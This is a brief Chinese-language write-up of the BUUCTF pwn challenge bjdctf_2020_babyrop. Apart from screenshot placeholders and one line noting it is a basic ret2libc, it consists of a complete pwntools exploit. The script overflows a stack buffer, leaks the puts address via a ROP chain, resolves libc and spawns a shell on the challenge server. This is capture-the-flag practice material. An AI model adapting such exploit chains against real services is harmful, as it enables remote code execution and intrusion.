BUUCTF-PWN-bjdctf_2020_babyrop

checksec

image-20220118214029208

IDA

image-20220118214114841

image-20220118214136629

又是基本的ret2libc

image-20220118214513048

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'

p = remote('node4.buuoj.cn', 25135)
elf = ELF('./bjdctf_2020_babyrop')

main_addr = elf.sym['main']
rdi_ret = 0x400733
ret = 0x4004c9
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

payload1 = b'a' * (0x20 + 0x8) + p64(rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)

p.sendlineafter('story!\n', payload1)
puts_addr = u64(p.recvuntil('\n')[:-1].ljust(8, b'\x00'))
print(hex(puts_addr))

libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
sys_addr = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')

payload2 = b'a' * (0x20 + 0x8) + p64(ret) + p64(rdi_ret) + p64(binsh) + p64(sys_addr)
p.sendlineafter('story!\n', payload2)

p.interactive()

结果

image-20220118214615820

0号就是正确的

image-20220118214641081